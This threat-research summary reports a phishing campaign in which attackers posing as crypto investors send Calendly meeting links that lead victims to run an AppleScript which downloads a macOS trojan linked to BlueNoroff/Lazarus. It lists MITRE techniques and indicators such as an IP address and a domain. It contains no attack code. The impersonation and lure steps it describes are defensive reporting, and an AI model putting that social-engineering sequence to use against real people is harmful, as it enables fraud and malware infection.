Threat Research

Calendar Meeting Links Used to Spread Mac Malware – Krebs on Security

Securonix

A scam campaign uses calendar-link phishing via Calendly to deliver macOS malware, with attackers posing as crypto investors to lure victims into a video call. The delivered AppleScript trojan is linked to North Korean threat actors BlueNoroff and Lazarus, and Calendly has begun implementing defenses while researchers note widespread Mac-focused information-stealing malware. #BlueNoroff #Lazarus #SignumCapital #CryptowaveCapital #macOS

Keypoints

  • The attack starts with a Calendly meeting link crafted to lure targets by impersonating an established investor.
  • The scammer uses a Telegram persona (Ian Lee) and then provides a new link, claiming a tech issue with the video platform.
  • Clicking the link prompts an Apple Script (.scpt) that downloads and executes a macOS trojan.
  • The malware is associated with North Korean actors BlueNoroff, linked to Lazarus per SlowMist and other researchers.
  • DNS/IP activity and multiple domains (including cryptowave.capital) are used to host the fake meeting pages and phishing infrastructure.
  • Mac security defenses (XProtect) have difficulty detecting evolving stealer families, highlighting MAC-focused threats.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – The attacker used a Calendly link on event pages to insert malicious links and lure the target into clicking. ‘SlowMist says the North Korean phishing scams used the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks.’
  • [T1059.005] Command and Scripting Interpreter – The user ran an Apple Script (.scpt) that downloads and executes malware on macOS. ‘The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems.’
  • [T1105] Ingress Tool Transfer – The script downloaded a malicious trojan payload to the victim’s Mac. ‘downloads and executes a malicious trojan made to run on macOS systems.’
  • [T1036] Masquerading – The attacker impersonated a real investor (Ian Lee, Signum Capital) to gain trust and schedule a meeting. ‘the attacker impersonate established cryptocurrency investors and ask to schedule a video conference call.’
  • [T1562.001] Impair Defenses – The malware attempts to evade macOS defenses (XProtect). ‘Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures.’

Indicators of Compromise

  • [IP Address] 104.168.163.149 – The host behind the fake meeting website that Doug was directed to.
  • [Domain] cryptowave.capital – Example domain used to mask a fake crypto firm (Cryptowave Capital).
  • [File] Apple Script (.scpt) – Malicious script downloaded via the Calendly link that downloads and executes a trojan on macOS.

Read more: https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint